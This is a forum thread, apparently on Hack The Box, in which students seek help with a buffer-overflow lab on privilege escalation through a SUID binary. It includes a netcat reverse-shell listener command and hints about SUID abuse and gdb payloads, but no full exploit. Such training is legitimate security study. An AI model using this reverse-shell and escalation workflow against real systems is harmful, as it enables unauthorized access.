Hello, I’ve been struggling for a week now… and I can’t seem to find an answer, tried to think out of the box tho. Maybe I’m still @ the matrix.
The “problem” I see.
The thing is I’m trying the last challenge of the HTB academy :
'Read the file “/root/flag.txt” and submit the content as the answer. ’
In the whole tutorial, we can see we can abuse a stack-based overflow in order to spawn a reverse shell for example. But does not regard anything about privilege escalation.
Some confusing things…
In the exercise it’s said:
After our research, we found out that these messages are stored in "/htb-student/msg.txt," which is binary owned by the user root, and the SUID bit is set.
Although /htb-student/msg.txt has no SUID bit nor is root-owned…
Anyway, the approach I have tried is to obtain some other shellcode (for linux 32 bits) from : http://shell-storm.org.
But I got no luck… I don’t know how can I get to the flag and my light of hope is slowly fading out… someone can give me a light? Or shall i cry in this dark dark room?
I’m stuck exactly on the same spot @blueprismo, I’m able to do nc, receive the shell, etc, but unable to access the file flag.txt. It looks to be a rabbit hole.
Today I’ll return to this, lets see if I can find another way.
I’m stuck exactly on the same spot @blueprismo, I’m able to do nc, receive the shell, etc, but unable to access the file flag.txt. It looks to be a rabbit hole.
Today I’ll return to this, lets see if I can find another way.
hi, @zuk4 can you gimme a hint , i can’t connect between nc and gdb, thanks
I’m stuck exactly on the same spot @blueprismo, I’m able to do nc, receive the shell, etc, but unable to access the file flag.txt. It looks to be a rabbit hole.
Today I’ll return to this, lets see if I can find another way.
hi, @zuk4 can you gimme a hint , i can’t connect between nc and gdb, thanks
Send me a PM with what you have done so far and we can see it.
I declare this impossible… this lack of information, and bad writing… confusing, frustrating and not good for learning… stack is growing the other way (as if the binary is compiled without the flag --no-stack-protector).
look, i get the reverse shell, but i enter with that normal user, can’t even read, i’m at the same spot where i begin… but with a fancy reverse shell… woah…
I am also stuck on this, I followed all of the stuff that was taught in the tutorial and I have been reading and watching all different kinds of exploits and have learned a lot of stuff but none of them seem to pertain to this challenge. I note what blueprismo said but I am not sure what I am missing
I am also stuck on this, I followed all of the stuff that was taught in the tutorial and I have been reading and watching all different kinds of exploits and have learned a lot of stuff but none of them seem to pertain to this challenge. I note what blueprismo said but I am not sure what I am missing
I don’t want to give you a direct answer at it’s against the rules. But check these points:
1- did you get a reverse shell = (rs)? How?
2- With this rs, what user are you logged in?
3- you know how sticky bits work, right?
4- find the file with the sticky bit set.
5- remember when you are inside gdb and run " $(python -c blablabla)" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’
I can’t help you more, check these points and I’m sure you will pass
keep me updated.
hi all,
can any one guide me…
i’m badly stuck on below section…
┌──(kalilinux㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kalilinux:
listening on [any] 443 …
hi all,
can any one guide me…
i’m badly stuck on below section…
┌──(kalilinux㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kalilinux:
listening on [any] 443 …
Nothing is appear after this…
What should happen? Don’t you need to trigger something remotely?
I don’t want to give you a direct answer at it’s against the rules. But check these points:
1- did you get a reverse shell = (rs)? How?
2- With this rs, what user are you logged in?
3- you know how sticky bits work, right?
4- find the file with the sticky bit set.
5- remember when you are inside gdb and run " $(python -c blablabla)" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’
I can’t help you more, check these points and I’m sure you will pass
keep me updated.
I believe i have what you are describing with the running of python. I also have read more about the SUID and executables. I have tried running python with the file and i can get commands to run but i stay as the normal user. I do feel like im on the right track
I think that I may have lost sight of the buffer overflow part now. The information that i have learned for SUID show mostly abusing running of particular programs that apart of the linux system.
I am weary to elaborate on what i have tried as I dont want to reveal the things that dont work, and get in trouble.
The issue I had was not due to my understanding, it was the use of smart quotes in my command that I was creating. I was using Cherrytree to assemble all of my code and the default in Cherrytree is to use smart quotes. Once I removed the wrong characters and changed my quotes to the right ones it worked. The settings im talking about are in the preferences > Special Characters > uncheck the Smart Quotes
how did u find out?
